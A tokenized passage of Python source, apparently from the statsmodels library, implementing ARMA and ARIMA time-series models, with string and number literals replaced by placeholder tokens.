<NUM_LIT:3> * <NUM_LIT:2> ) . reshape ( len ( g ) , <NUM_LIT:3> , <NUM_LIT:2> ) [ : , : , <NUM_LIT:1> ] , g ) ) <EOL> x = np . arange ( len ( g ) * <NUM_LIT:3> ) . reshape ( len ( g ) , <NUM_LIT:3> , order = '<STR_LIT:F>' ) <EOL> mygroup = Group ( g ) <EOL> print ( mygroup . group_int ) <EOL> print ( mygroup . group_sums ( x ) ) <EOL> print ( mygroup . labels ( ) ) </s>
<s> from __future__ import absolute_import <EOL> from statsmodels . compat . python import string_types , range <EOL> from datetime import datetime <EOL> import numpy as np <EOL> from scipy import optimize <EOL> from scipy . stats import t , norm <EOL> from scipy . signal import lfilter <EOL> from numpy import dot , log , zeros , pi <EOL> from numpy . linalg import inv <EOL> from statsmodels . tools . decorators import ( cache_readonly , <EOL> resettable_cache ) <EOL> import statsmodels . tsa . base . tsa_model as tsbase <EOL> import statsmodels . base . wrapper as wrap <EOL> from statsmodels . regression . linear_model import yule_walker , GLS <EOL> from statsmodels . tsa . tsatools import ( lagmat , add_trend , <EOL> _ar_transparams , _ar_invtransparams , <EOL> _ma_transparams , _ma_invtransparams , <EOL> unintegrate , unintegrate_levels ) <EOL> from statsmodels . tsa . vector_ar import util <EOL> from statsmodels . tsa . ar_model import AR <EOL> from statsmodels . tsa . arima_process import arma2ma <EOL> from statsmodels . tools . numdiff import approx_hess_cs , approx_fprime_cs <EOL> from statsmodels . tsa . base . datetools import _index_date <EOL> from statsmodels . tsa . kalmanf import KalmanFilter <EOL> _armax_notes = """<STR_LIT>""" <EOL> _arma_params = """<STR_LIT>""" <EOL> _arma_model = "<STR_LIT>" <EOL> _arima_model = "<STR_LIT>" <EOL> _arima_params = """<STR_LIT>""" <EOL> _predict_notes = """<STR_LIT>""" <EOL> _results_notes = """<STR_LIT>""" <EOL> _predict = """<STR_LIT>""" <EOL> _predict_returns = """<STR_LIT>""" <EOL> _arma_predict = _predict % { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : """<STR_LIT>""" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : _predict_returns , <EOL> "<STR_LIT>" : _predict_notes } <EOL> _arma_results_predict = _predict % { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : _predict_returns , <EOL> "<STR_LIT>" : _results_notes } <EOL> _arima_predict = _predict % { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : """<STR_LIT>""" , <EOL> "<STR_LIT>" : """<STR_LIT>""" , "<STR_LIT>" : _predict_returns , <EOL> "<STR_LIT>" : _predict_notes } <EOL> _arima_results_predict = _predict % { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <EOL> """<STR_LIT>""" , <EOL> "<STR_LIT>" : _predict_returns , <EOL> "<STR_LIT>" : _results_notes } <EOL> _arima_plot_predict_example = """<STR_LIT>""" <EOL> _plot_predict = ( """<STR_LIT>""" + '<STR_LIT:\n>' . join ( _predict . split ( '<STR_LIT:\n>' ) [ <NUM_LIT:2> : ] ) ) % { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : """<STR_LIT>""" , <EOL> "<STR_LIT>" : """<STR_LIT>""" , <EOL> "<STR_LIT>" : ( '<STR_LIT:\n>' + _arima_plot_predict_example + <EOL> '<STR_LIT:\n>' + _results_notes ) <EOL> } <EOL> _arima_plot_predict = ( """<STR_LIT>""" + '<STR_LIT:\n>' . join ( _predict . split ( '<STR_LIT:\n>' ) [ <NUM_LIT:2> : ] ) ) % { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : """<STR_LIT>""" , <EOL> "<STR_LIT>" : """<STR_LIT>""" , <EOL> "<STR_LIT>" : ( '<STR_LIT:\n>' + _arima_plot_predict_example + <EOL> '<STR_LIT:\n>' + <EOL> '<STR_LIT:\n>' . join ( _results_notes . split ( '<STR_LIT:\n>' ) [ : <NUM_LIT:3> ] ) + <EOL> ( """<STR_LIT>""" ) + <EOL> '<STR_LIT:\n>' . join ( _results_notes . split ( '<STR_LIT:\n>' ) [ <NUM_LIT:3> : ] ) ) <EOL> } <EOL> def cumsum_n ( x , n ) : <EOL> if n : <EOL> n -= <NUM_LIT:1> <EOL> x = np . cumsum ( x ) <EOL> return cumsum_n ( x , n ) <EOL> else : <EOL> return x <EOL> def _check_arima_start ( start , k_ar , k_diff , method , dynamic ) : <EOL> if start < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % start ) <EOL> elif ( dynamic or '<STR_LIT>' not in method ) and start < k_ar : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % start ) <EOL> def _get_predict_out_of_sample ( endog , p , q , k_trend , k_exog , start , errors , <EOL> trendparam , exparams , arparams , maparams , steps , <EOL> method , exog = None ) : <EOL> """<STR_LIT>""" <EOL> if q : <EOL> resid = np . zeros ( q ) <EOL> if start and '<STR_LIT>' in method or ( start == p and not start == <NUM_LIT:0> ) : <EOL> resid [ : q ] = errors [ start - q : start ] <EOL> elif start : <EOL> resid [ : q ] = errors [ start - q - p : start - p ] <EOL> else : <EOL> resid [ : q ] = errors [ - q : ] <EOL> else : <EOL> resid = None <EOL> y = endog <EOL> if k_trend == <NUM_LIT:1> : <EOL> if k_exog > <NUM_LIT:0> : <EOL> if np . ndim ( exog ) == <NUM_LIT:1> and k_exog == <NUM_LIT:1> : <EOL> exog = exog [ : , None ] <EOL> elif np . ndim ( exog ) == <NUM_LIT:1> : <EOL> if len ( exog ) != k_exog : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> exog = exog [ None , : ] <EOL> X = lagmat ( np . dot ( exog , exparams ) , p , original = '<STR_LIT>' , trim = '<STR_LIT>' ) <EOL> mu = trendparam * ( <NUM_LIT:1> - arparams . sum ( ) ) <EOL> mu = mu + ( np . r_ [ <NUM_LIT:1> , - arparams [ : : - <NUM_LIT:1> ] ] * X ) . sum ( <NUM_LIT:1> ) [ : , None ] <EOL> else : <EOL> mu = trendparam * ( <NUM_LIT:1> - arparams . sum ( ) ) <EOL> mu = np . array ( [ mu ] * steps ) <EOL> elif k_exog > <NUM_LIT:0> : <EOL> X = np . dot ( exog , exparams ) <EOL> X = lagmat ( X , p , original = '<STR_LIT>' , trim = '<STR_LIT>' ) <EOL> mu = ( np . r_ [ <NUM_LIT:1> , - arparams [ : : - <NUM_LIT:1> ] ] * X ) . sum ( <NUM_LIT:1> ) [ : , None ] <EOL> else : <EOL> mu = np . zeros ( steps ) <EOL> endog = np . zeros ( p + steps - <NUM_LIT:1> ) <EOL> if p and start : <EOL> endog [ : p ] = y [ start - p : start ] <EOL> elif p : <EOL> endog [ : p ] = y [ - p : ] <EOL> return endog , resid , mu <EOL> def _arma_predict_out_of_sample ( params , steps , errors , p , q , k_trend , k_exog , <EOL> endog , exog = None , start = <NUM_LIT:0> , method = '<STR_LIT>' ) : <EOL> ( trendparam , exparams , <EOL> arparams , maparams ) = _unpack_params ( params , ( p , q ) , k_trend , <EOL> k_exog , reverse = True ) <EOL> endog , resid , mu = _get_predict_out_of_sample ( endog , p , q , k_trend , k_exog , <EOL> start , errors , trendparam , <EOL> exparams , arparams , <EOL> maparams , steps , method , <EOL> exog ) <EOL> forecast = np . zeros ( steps ) <EOL> if steps == <NUM_LIT:1> : <EOL> if q : <EOL> return mu [ <NUM_LIT:0> ] + np . dot ( arparams , endog [ : p ] ) + np . dot ( maparams , <EOL> resid [ : q ] ) <EOL> else : <EOL> return mu [ <NUM_LIT:0> ] + np . dot ( arparams , endog [ : p ] ) <EOL> if q : <EOL> i = <NUM_LIT:0> <EOL> else : <EOL> i = - <NUM_LIT:1> <EOL> for i in range ( min ( q , steps - <NUM_LIT:1> ) ) : <EOL> fcast = ( mu [ i ] + np . dot ( arparams , endog [ i : i + p ] ) + <EOL> np . dot ( maparams [ : q - i ] , resid [ i : i + q ] ) ) <EOL> forecast [ i ] = fcast <EOL> endog [ i + p ] = fcast <EOL> for i in range ( i + <NUM_LIT:1> , steps - <NUM_LIT:1> ) : <EOL> fcast = mu [ i ] + np . dot ( arparams , endog [ i : i + p ] ) <EOL> forecast [ i ] = fcast <EOL> endog [ i + p ] = fcast <EOL> forecast [ steps - <NUM_LIT:1> ] = mu [ steps - <NUM_LIT:1> ] + np . dot ( arparams , endog [ steps - <NUM_LIT:1> : ] ) <EOL> return forecast <EOL> def _arma_predict_in_sample ( start , end , endog , resid , k_ar , method ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in method : <EOL> fittedvalues = endog - resid <EOL> else : <EOL> fittedvalues = endog [ k_ar : ] - resid <EOL> fv_start = start <EOL> if '<STR_LIT>' not in method : <EOL> fv_start -= k_ar <EOL> fv_end = min ( len ( fittedvalues ) , end + <NUM_LIT:1> ) <EOL> return fittedvalues [ fv_start : fv_end ] <EOL> def _validate ( start , k_ar , k_diff , dates , method ) : <EOL> if isinstance ( start , ( string_types , datetime ) ) : <EOL> start = _index_date ( start , dates ) <EOL> start -= k_diff <EOL> if '<STR_LIT>' not in method and start < k_ar - k_diff : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % start ) <EOL> return start <EOL> def _unpack_params ( params , order , k_trend , k_exog , reverse = False ) : <EOL> p , q = order <EOL> k = k_trend + k_exog <EOL> maparams = params [ k + p : ] <EOL> arparams = params [ k : k + p ] <EOL> trend = params [ : k_trend ] <EOL> exparams = params [ k_trend : k ] <EOL> if reverse : <EOL> return trend , exparams , arparams [ : : - <NUM_LIT:1> ] , maparams [ : : - <NUM_LIT:1> ] <EOL> return trend , exparams , arparams , maparams <EOL> def _unpack_order ( order ) : <EOL> k_ar , k_ma , k = order <EOL> k_lags = max ( k_ar , k_ma + <NUM_LIT:1> ) <EOL> return k_ar , k_ma , order , k_lags <EOL> def _make_arma_names ( data , k_trend , order , exog_names ) : <EOL> k_ar , k_ma = order <EOL> exog_names = exog_names or [ ] <EOL> ar_lag_names = util . make_lag_names ( [ data . ynames ] , k_ar , <NUM_LIT:0> ) <EOL> ar_lag_names = [ '<STR_LIT>' . join ( ( '<STR_LIT>' , i ) ) for i in ar_lag_names ] <EOL> ma_lag_names = util . make_lag_names ( [ data . ynames ] , k_ma , <NUM_LIT:0> ) <EOL> ma_lag_names = [ '<STR_LIT>' . join ( ( '<STR_LIT>' , i ) ) for i in ma_lag_names ] <EOL> trend_name = util . make_lag_names ( '<STR_LIT>' , <NUM_LIT:0> , k_trend ) <EOL> if exog_names [ - k_ma : ] == ma_lag_names and exog_names [ - ( k_ar + k_ma ) : - k_ma ] == ar_lag_names and ( not exog_names or not trend_name or trend_name [ <NUM_LIT:0> ] == exog_names [ <NUM_LIT:0> ] ) : <EOL> return exog_names <EOL> exog_names = trend_name + exog_names + ar_lag_names + ma_lag_names <EOL> return exog_names <EOL> def _make_arma_exog ( endog , exog , trend ) : <EOL> k_trend = <NUM_LIT:1> <EOL> if exog is None and trend == '<STR_LIT:c>' : <EOL> exog = np . ones ( ( len ( endog ) , <NUM_LIT:1> ) ) <EOL> elif exog is not None and trend == '<STR_LIT:c>' : <EOL> exog = add_trend ( exog , trend = '<STR_LIT:c>' , prepend = True ) <EOL> elif exog is not None and trend == '<STR_LIT>' : <EOL> if exog . var ( ) == <NUM_LIT:0> : <EOL> exog = None <EOL> k_trend = <NUM_LIT:0> <EOL> if trend == '<STR_LIT>' : <EOL> k_trend = <NUM_LIT:0> <EOL> return k_trend , exog <EOL> def _check_estimable ( nobs , n_params ) : <EOL> if nobs <= n_params : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> class ARMA ( tsbase . TimeSeriesModel ) : <EOL> __doc__ = tsbase . _tsa_doc % { "<STR_LIT>" : _arma_model , <EOL> "<STR_LIT>" : _arma_params , "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : _armax_notes % <EOL> { "<STR_LIT>" : "<STR_LIT>" } } <EOL> def __init__ ( self , endog , order , exog = None , dates = None , freq = None , <EOL> missing = '<STR_LIT:none>' ) : <EOL> super ( ARMA , self ) . __init__ ( endog , exog , dates , freq , missing = missing ) <EOL> exog = self . data . exog <EOL> _check_estimable ( len ( self . endog ) , sum ( order ) ) <EOL> self . k_ar = k_ar = order [ <NUM_LIT:0> ] <EOL> self . k_ma = k_ma = order [ <NUM_LIT:1> ] <EOL> self . k_lags = max ( k_ar , k_ma + <NUM_LIT:1> ) <EOL> if exog is not None : <EOL> if exog . ndim == <NUM_LIT:1> : <EOL> exog = exog [ : , None ] <EOL> k_exog = exog . shape [ <NUM_LIT:1> ] <EOL> else : <EOL> k_exog = <NUM_LIT:0> <EOL> self . k_exog = k_exog <EOL> def _fit_start_params_hr ( self , order ) : <EOL> """<STR_LIT>""" <EOL> p , q , k = order <EOL> start_params = zeros ( ( p + q + k ) ) <EOL> endog = self . endog . copy ( ) <EOL> exog = self . exog <EOL> if k != <NUM_LIT:0> : <EOL> ols_params = GLS ( endog , exog ) . fit ( ) . params <EOL> start_params [ : k ] = ols_params <EOL> endog -= np . dot ( exog , ols_params ) . squeeze ( ) <EOL> if q != <NUM_LIT:0> : <EOL> if p != <NUM_LIT:0> : <EOL> nobs = len ( endog ) <EOL> maxlag = int ( round ( <NUM_LIT:12> * ( nobs / <NUM_LIT> ) ** ( <NUM_LIT:1> / <NUM_LIT> ) ) ) <EOL> if maxlag >= nobs : <EOL> maxlag = nobs - <NUM_LIT:1> <EOL> armod = AR ( endog ) . fit ( ic = '<STR_LIT>' , trend = '<STR_LIT>' , maxlag = maxlag ) <EOL> arcoefs_tmp = armod . params <EOL> p_tmp = armod . k_ar <EOL> if p_tmp + q >= len ( endog ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> resid = endog [ p_tmp : ] - np . dot ( lagmat ( endog , p_tmp , <EOL> trim = '<STR_LIT>' ) , <EOL> arcoefs_tmp ) <EOL> if p < p_tmp + q : <EOL> endog_start = p_tmp + q - p <EOL> resid_start = <NUM_LIT:0> <EOL> else : <EOL> endog_start = <NUM_LIT:0> <EOL> resid_start = p - p_tmp - q <EOL> lag_endog = lagmat ( endog , p , '<STR_LIT>' ) [ endog_start : ] <EOL> lag_resid = lagmat ( resid , q , '<STR_LIT>' ) [ resid_start : ] <EOL> X = np . column_stack ( ( lag_endog , lag_resid ) ) <EOL> coefs = GLS ( endog [ max ( p_tmp + q , p ) : ] , X ) . fit ( ) . params <EOL> start_params [ k : k + p + q ] = coefs <EOL> else : <EOL> start_params [ k + p : k + p + q ] = yule_walker ( endog , order = q ) [ <NUM_LIT:0> ] <EOL> if q == <NUM_LIT:0> and p != <NUM_LIT:0> : <EOL> arcoefs = yule_walker ( endog , order = p ) [ <NUM_LIT:0> ] <EOL> start_params [ k : k + p ] = arcoefs <EOL> if p and not np . all ( np . abs ( np . roots ( np . r_ [ <NUM_LIT:1> , - start_params [ k : k + p ] ] <EOL> ) ) < <NUM_LIT:1> ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> elif q and not np . all ( np . abs ( np . roots ( np . r_ [ <NUM_LIT:1> , start_params [ k + p : ] ] <EOL> ) ) < <NUM_LIT:1> ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return start_params <EOL> def _fit_start_params ( self , order , method ) : <EOL> if method != '<STR_LIT>' : <EOL> start_params = self . _fit_start_params_hr ( order ) <EOL> else : <EOL> func = lambda params : - self . loglike_css ( params ) <EOL> start_params = self . _fit_start_params_hr ( order ) <EOL> if self . transparams : <EOL> start_params = self . _invtransparams ( start_params ) <EOL> bounds = [ ( None , ) * <NUM_LIT:2> ] * sum ( order ) <EOL> mlefit = optimize . fmin_l_bfgs_b ( func , start_params , <EOL> approx_grad = True , m = <NUM_LIT:12> , <EOL> pgtol = <NUM_LIT> , factr = <NUM_LIT> , <EOL> bounds = bounds , iprint = - <NUM_LIT:1> ) <EOL> start_params = self . _transparams ( mlefit [ <NUM_LIT:0> ] ) <EOL> return start_params <EOL> def score ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return approx_fprime_cs ( params , self . loglike , args = ( False , ) ) <EOL> def hessian ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return approx_hess_cs ( params , self . loglike , args = ( False , ) ) <EOL> def _transparams ( self , params ) : <EOL> """<STR_LIT>""" <EOL> k_ar , k_ma = self . k_ar , self . k_ma <EOL> k = self . k_exog + self . k_trend <EOL> newparams = np . zeros_like ( params ) <EOL> if k != <NUM_LIT:0> : <EOL> newparams [ : k ] = params [ : k ] <EOL> if k_ar != <NUM_LIT:0> : <EOL> newparams [ k : k + k_ar ] = _ar_transparams ( params [ k : k + k_ar ] . copy ( ) ) <EOL> if k_ma != <NUM_LIT:0> : <EOL> newparams [ k + k_ar : ] = _ma_transparams ( params [ k + k_ar : ] . copy ( ) ) <EOL> return newparams <EOL> def _invtransparams ( self , start_params ) : <EOL> """<STR_LIT>""" <EOL> k_ar , k_ma = self . k_ar , self . k_ma <EOL> k = self . k_exog + self . k_trend <EOL> newparams = start_params . copy ( ) <EOL> arcoefs = newparams [ k : k + k_ar ] <EOL> macoefs = newparams [ k + k_ar : ] <EOL> if k_ar != <NUM_LIT:0> : <EOL> newparams [ k : k + k_ar ] = _ar_invtransparams ( arcoefs ) <EOL> if k_ma != <NUM_LIT:0> : <EOL> newparams [ k + k_ar : k + k_ar + k_ma ] = _ma_invtransparams ( macoefs ) <EOL> return newparams <EOL> def _get_predict_start ( self , start , dynamic ) : <EOL> method = getattr ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> k_ar = getattr ( self , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> k_diff = getattr ( self , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> if start is None : <EOL> if '<STR_LIT>' in method and not dynamic : <EOL> start = <NUM_LIT:0> <EOL> else : <EOL> start = k_ar <EOL> self . _set_predict_start_date ( start ) <EOL> elif isinstance ( start , int ) : <EOL> start = super ( ARMA , self ) . _get_predict_start ( start ) <EOL> else : <EOL> start = _validate ( start , k_ar , k_diff , self . data . dates , <EOL> method ) <EOL> start = super ( ARMA , self ) . _get_predict_start ( start ) <EOL> _check_arima_start ( start , k_ar , k_diff , method , dynamic ) <EOL> return start <EOL> def _get_predict_end ( self , end , dynamic = False ) : <EOL> return super ( ARMA , self ) . _get_predict_end ( end ) <EOL> def geterrors ( self , params ) : <EOL> """<STR_LIT>""" <EOL> params = np . asarray ( params ) <EOL> k_ar , k_ma = self . k_ar , self . k_ma <EOL> k = self . k_exog + self . k_trend <EOL> method = getattr ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if '<STR_LIT>' in method : <EOL> ( y , k , nobs , k_ar , k_ma , k_lags , newparams , Z_mat , m , R_mat , <EOL> T_mat , paramsdtype ) = KalmanFilter . _init_kalman_state ( params , <EOL> self ) <EOL> errors = KalmanFilter . geterrors ( y , k , k_ar , k_ma , k_lags , nobs , <EOL> Z_mat , m , R_mat , T_mat , <EOL> paramsdtype ) <EOL> if isinstance ( errors , tuple ) : <EOL> errors = errors [ <NUM_LIT:0> ] <EOL> else : <EOL> y = self . endog . copy ( ) <EOL> k = self . k_exog + self . k_trend <EOL> if k > <NUM_LIT:0> : <EOL> y -= dot ( self . exog , params [ : k ] ) <EOL> k_ar = self . k_ar <EOL> k_ma = self . k_ma <EOL> ( trendparams , exparams , <EOL> arparams , maparams ) = _unpack_params ( params , ( k_ar , k_ma ) , <EOL> self . k_trend , self . k_exog , <EOL> reverse = False ) <EOL> b , a = np . r_ [ <NUM_LIT:1> , - arparams ] , np . r_ [ <NUM_LIT:1> , maparams ] <EOL> zi = zeros ( ( max ( k_ar , k_ma ) ) ) <EOL> for i in range ( k_ar ) : <EOL> zi [ i ] = sum ( - b [ : i + <NUM_LIT:1> ] [ : : - <NUM_LIT:1> ] * y [ : i + <NUM_LIT:1> ] ) <EOL> e = lfilter ( b , a , y , zi = zi ) <EOL> errors = e [ <NUM_LIT:0> ] [ k_ar : ] <EOL> return errors . squeeze ( ) <EOL> def predict ( self , params , start = None , end = None , exog = None , dynamic = False ) : <EOL> method = getattr ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> start = self . _get_predict_start ( start , dynamic ) <EOL> end , out_of_sample = self . _get_predict_end ( end , dynamic ) <EOL> if out_of_sample and ( exog is None and self . k_exog > <NUM_LIT:0> ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> endog = self . endog <EOL> resid = self . geterrors ( params ) <EOL> k_ar = self . k_ar <EOL> if exog is not None : <EOL> exog = np . asarray ( exog ) <EOL> if self . k_exog == <NUM_LIT:1> and exog . ndim == <NUM_LIT:1> : <EOL> exog = exog [ : , None ] <EOL> if out_of_sample != <NUM_LIT:0> and self . k_exog > <NUM_LIT:0> : <EOL> if self . k_exog > <NUM_LIT:0> and k_ar > <NUM_LIT:0> and not dynamic : <EOL> exog = np . vstack ( ( self . exog [ - k_ar : , self . k_trend : ] , exog ) ) <EOL> if dynamic : <EOL> if self . k_exog > <NUM_LIT:0> : <EOL> exog = np . vstack ( ( self . exog [ start - k_ar : , self . k_trend : ] , exog ) ) <EOL> out_of_sample += end - start + <NUM_LIT:1> <EOL> return _arma_predict_out_of_sample ( params , out_of_sample , resid , <EOL> k_ar , self . k_ma , self . k_trend , <EOL> self . k_exog , endog , exog , <EOL> start , method ) <EOL> predictedvalues = _arma_predict_in_sample ( start , end , endog , resid , <EOL> k_ar , method ) <EOL> if out_of_sample : <EOL> forecastvalues = _arma_predict_out_of_sample ( params , out_of_sample , <EOL> resid , k_ar , <EOL> self . k_ma , <EOL> self . k_trend , <EOL> self . k_exog , endog , <EOL> exog , method = method ) <EOL> predictedvalues = np . r_ [ predictedvalues , forecastvalues ] <EOL> return predictedvalues <EOL> predict . __doc__ = _arma_predict <EOL> def loglike ( self , params , set_sigma2 = True ) : <EOL> """<STR_LIT>""" <EOL> method = self . method <EOL> if method in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return self . loglike_kalman ( params , set_sigma2 ) <EOL> elif method == '<STR_LIT>' : <EOL> return self . loglike_css ( params , set_sigma2 ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % method ) <EOL> def loglike_kalman ( self , params , set_sigma2 = True ) : <EOL> """<STR_LIT>""" <EOL> return KalmanFilter . loglike ( params , self , set_sigma2 ) <EOL> def loglike_css ( self , params , set_sigma2 = True ) : <EOL> """<STR_LIT>""" <EOL> k_ar = self . k_ar <EOL> k_ma = self . k_ma <EOL> k = self . k_exog + self . k_trend <EOL> y = self . endog . copy ( ) . astype ( params . dtype ) <EOL> nobs = self . nobs <EOL> if self . transparams : <EOL> newparams = self . _transparams ( params ) <EOL> else : <EOL> newparams = params <EOL> if k > <NUM_LIT:0> : <EOL> y -= dot ( self . exog , newparams [ : k ] ) <EOL> b , a = np . r_ [ <NUM_LIT:1> , - newparams [ k : k + k_ar ] ] , np . r_ [ <NUM_LIT:1> , newparams [ k + k_ar : ] ] <EOL> zi = np . zeros ( ( max ( k_ar , k_ma ) ) , dtype = params . dtype ) <EOL> for i in range ( k_ar ) : <EOL> zi [ i ] = sum ( - b [ : i + <NUM_LIT:1> ] [ : : - <NUM_LIT:1> ] * y [ : i + <NUM_LIT:1> ] ) <EOL> errors = lfilter ( b , a , y , zi = zi ) [ <NUM_LIT:0> ] [ k_ar : ] <EOL> ssr = np . dot ( errors , errors ) <EOL> sigma2 = ssr / nobs <EOL> if set_sigma2 : <EOL> self . sigma2 = sigma2 <EOL> llf = - nobs / <NUM_LIT> * ( log ( <NUM_LIT:2> * pi ) + log ( sigma2 ) ) - ssr / ( <NUM_LIT:2> * sigma2 ) <EOL> return llf <EOL> def fit ( self , start_params = None , trend = '<STR_LIT:c>' , method = "<STR_LIT>" , <EOL> transparams = True , solver = '<STR_LIT>' , maxiter = <NUM_LIT:50> , full_output = <NUM_LIT:1> , <EOL> disp = <NUM_LIT:5> , callback = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> k_ar = self . k_ar <EOL> k_ma = self . k_ma <EOL> self . transparams = transparams <EOL> endog , exog = self . endog , self . exog <EOL> k_exog = self . k_exog <EOL> self . nobs = len ( endog ) <EOL> k_trend , exog = _make_arma_exog ( endog , self . exog , trend ) <EOL> if k_ar == <NUM_LIT:0> and k_ma == <NUM_LIT:0> and k_trend == <NUM_LIT:0> and k_exog == <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> _check_estimable ( len ( endog ) , k_ar + k_ma + k_exog + k_trend ) <EOL> self . k_trend = k_trend <EOL> self . exog = exog <EOL> self . exog_names = _make_arma_names ( self . data , k_trend , ( k_ar , k_ma ) , <EOL> self . exog_names ) <EOL> k = k_trend + k_exog <EOL> if k_ma == <NUM_LIT:0> and k_ar == <NUM_LIT:0> : <EOL> method = "<STR_LIT>" <EOL> self . method = method = method . lower ( ) <EOL> if method == '<STR_LIT>' : <EOL> self . nobs = len ( self . endog ) - k_ar <EOL> if start_params is not None : <EOL> start_params = np . asarray ( start_params ) <EOL> else : <EOL> start_params = self . _fit_start_params ( ( k_ar , k_ma , k ) , method ) <EOL> if transparams : <EOL> start_params = self . _invtransparams ( start_params ) <EOL> if solver == '<STR_LIT>' : <EOL> kwargs . setdefault ( '<STR_LIT>' , <NUM_LIT> ) <EOL> kwargs . setdefault ( '<STR_LIT>' , <NUM_LIT> ) <EOL> kwargs . setdefault ( '<STR_LIT:m>' , <NUM_LIT:12> ) <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> mlefit = super ( ARMA , self ) . fit ( start_params , method = solver , <EOL> maxiter = maxiter , <EOL> full_output = full_output , disp = disp , <EOL> callback = callback , ** kwargs ) <EOL> params = mlefit . params <EOL> if transparams : <EOL> params = self . _transparams ( params ) <EOL> self . transparams = False <EOL> normalized_cov_params = None <EOL> armafit = ARMAResults ( self , params , normalized_cov_params ) <EOL> armafit . mle_retvals = mlefit . mle_retvals <EOL> armafit . mle_settings = mlefit . mle_settings <EOL> return ARMAResultsWrapper ( armafit ) <EOL> class ARIMA ( ARMA ) : <EOL> __doc__ = tsbase . _tsa_doc % { "<STR_LIT>" : _arima_model , <EOL> "<STR_LIT>" : _arima_params , "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : _armax_notes % <EOL> { "<STR_LIT>" : "<STR_LIT>" } } <EOL> def __new__ ( cls , endog , order , exog = None , dates = None , freq = None , <EOL> missing = '<STR_LIT:none>' ) : <EOL> p , d , q = order <EOL> if d == <NUM_LIT:0> : <EOL> return ARMA ( endog , ( p , q ) , exog , dates , freq , missing ) <EOL> else : <EOL> mod = super ( ARIMA , cls ) . __new__ ( cls ) <EOL> mod . __init__ ( endog , order , exog , dates , freq , missing ) <EOL> return mod <EOL> def __init__ ( self , endog , order , exog = None , dates = None , freq = None , <EOL> missing = '<STR_LIT:none>' ) : <EOL> p , d , q = order <EOL> if d > <NUM_LIT:2> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> super ( ARIMA , self ) . __init__ ( endog , ( p , q ) , exog , dates , freq , missing ) <EOL> self . k_diff = d <EOL> self . _first_unintegrate = unintegrate_levels ( self . endog [ : d ] , d ) <EOL> self . endog = np . diff ( self . endog , n = d ) <EOL> _check_estimable ( len ( self . endog ) , p + q ) <EOL> if exog is not None : <EOL> self . exog = self . exog [ d : ] <EOL> if d == <NUM_LIT:1> : <EOL> self . data . ynames = '<STR_LIT>' + self . endog_names <EOL> else : <EOL> self . data . ynames = '<STR_LIT>' . format ( d ) + self . endog_names <EOL> def _get_predict_start ( self , start , dynamic ) : <EOL> """<STR_LIT:U+0020>""" <EOL> k_diff = getattr ( self , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> method = getattr ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> k_ar = getattr ( self , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> if start is None : <EOL> if '<STR_LIT>' in method and not dynamic : <EOL> start = <NUM_LIT:0> <EOL> else : <EOL> start = k_ar <EOL> elif isinstance ( start , int ) : <EOL> start -= k_diff <EOL> try : <EOL> start = super ( ARIMA , self ) . _get_predict_start ( start , <EOL> dynamic ) <EOL> except IndexError : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( start + k_diff ) ) <EOL> else : <EOL> start = _validate ( start , k_ar , k_diff , self . data . dates , <EOL> method ) <EOL> start = super ( ARIMA , self ) . _get_predict_start ( start , dynamic ) <EOL> self . _set_predict_start_date ( start + k_diff ) <EOL> return start <EOL> def _get_predict_end ( self , end , dynamic = False ) : <EOL> """<STR_LIT>""" <EOL> end , out_of_sample = super ( ARIMA , self ) . _get_predict_end ( end , dynamic ) <EOL> if '<STR_LIT>' not in self . method and not dynamic : <EOL> end -= self . k_ar <EOL> return end - self . k_diff , out_of_sample <EOL> def fit ( self , start_params = None , trend = '<STR_LIT:c>' , method = "<STR_LIT>" , <EOL> transparams = True , solver = '<STR_LIT>' , maxiter = <NUM_LIT:50> , full_output = <NUM_LIT:1> , <EOL> disp = <NUM_LIT:5> , callback = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> mlefit = super ( ARIMA 